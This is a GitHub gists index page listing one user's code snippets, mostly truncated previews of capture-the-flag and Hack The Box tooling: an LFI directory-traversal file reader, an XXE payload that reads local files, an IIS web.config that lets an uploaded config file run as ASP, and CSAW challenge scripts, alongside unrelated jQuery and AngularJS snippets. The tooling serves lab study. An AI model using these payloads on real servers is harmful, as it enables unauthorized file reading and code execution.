Ge0rg3’s gists

Ge0rg3 / WaldoDirEnum.py

Created December 15, 2018 17:18

A directory enumeration script for the Waldo HTB machine through LFI.

	import requests as rq
	import sys, os

	url = "http://10.10.10.87/"
	headers={'Content-Type':'application/x-www-form-urlencoded'}
	startdir = "./.../...//.../...//.../...//"
	currentdir = startdir
	print("#########"4+"\n# Directory traversal file reader. #\n# Commands: cd, ls, cat & clear. #\n"+"#########"4)

	while True:

Ge0rg3 / colliding.js

Created December 10, 2018 22:04 — forked from jtsternberg/colliding.js

Detect if two elements are colliding/overlapping

	/**
	* Detects if two elements are colliding
	*
	* Credit goes to BC on Stack Overflow, cleaned up a little bit
	*
	* @link http://stackoverflow.com/questions/5419134/how-to-detect-if-two-divs-touch-with-jquery
	* @param $div1
	* @param $div2
	* @returns {boolean}
	*/

Ge0rg3 / web.config

Last active August 9, 2019 15:27

	<?xml version="1.0" encoding="UTF-8"?>
	<configuration>
	<system.webServer>
	<handlers accessPolicy="Read, Script, Write">
	<add name="web_config" path=".config" verb="" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
	</handlers>
	<security>
	<requestFiltering>
	<fileExtensions>
	<remove fileExtension=".config" />

Ge0rg3 / XXEnumerate_2.py

Created October 13, 2018 19:51

An XXE tool written for the DevOops box on HTB.

	import requests as rq
	import sys

	filename = sys.argv[1]
	url = "http://10.10.10.91:5000/upload"

	data = """<?xml version="1.0"?>
	<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file://FD" >]>
	<Container>
	<Author></Author>

Ge0rg3 / Clicker-PartF.py

Created October 7, 2018 00:17

Written for my CSAW Red 2018 Clicker Write-up

Ge0rg3 / .UserSearcher.html

Last active October 5, 2018 10:20

An AngularJS App to view details about a user's github profile. View it at https://georgeom.net/userSearcher/webpage.html

	An AngularJS App to view details about a user's github profile. View it at https://georgeom.net/userSearcher/webpage.html

	Code spread across the 4 attached files.

Ge0rg3 / Clicker-PartE.py

Created September 30, 2018 20:36

Written for my CSAW Red 2018 Clicker Write-up

	import requests as rq

	for i in range(1,1000):
	headers = {
	"bring_back_random_click":"hhhhhhhhhh",
	}
	req = rq.get("http://web.chal.csaw.io:10106/default/", headers=headers)
	if len(req.text) != 243:
	print req.text[:-1]
	break

Ge0rg3 / Clicker-PartE.py

Created September 30, 2018 19:33

Written for my CSAW Red 2018 Clicker Write-up

	import requests as rq
	import json
	url = "http://web.chal.csaw.io:10106/"

	def register(userpass):
	global auth
	if len(userpass) < 8:
	return "Please enter at least 8 characters."
	details = {
	"username":userpass,

Ge0rg3 / Clicker-PartD.py

Last active October 8, 2018 09:58

Written for my CSAW Red 2018 Clicker Write-up

	def stats():
	global auth
	userinfo = rq.get("http://web.chal.csaw.io:10106/user", headers=auth).json()
	userclickers = json.loads(rq.get("http://web.chal.csaw.io:10106/clicker/user", headers=auth).json().replace("'",'"'))
	print("##########\nStats for "+userinfo['username']+":")
	print("##########")
	print("Money: "+str(userinfo['money']))
	print("##########\nClicker Name \| Clicker Value \| Clicker Price\n"+("----------"*5))
	for count, i in enumerate(userclickers):
	print(i['name']+" \| "+str(i['value'])+" \| "+str(i['price']))

Ge0rg3 / Clicker-PartC.py

Created September 29, 2018 23:36

Written for my CSAW Red 2018 Clicker Write-up

	def click(clicker):
	global authorization
	data={'name':clicker}
	req = rq.post("http://web.chal.csaw.io:10106/clicker/click", headers=authorization, json=data)
	if req.json()['status'] == "success":
	return "Success!"
	elif req.json()['message'] == "Clicker not owned":
	return "Clicker not owned."
	else:
	return "Clicker does not exist."

George O Ge0rg3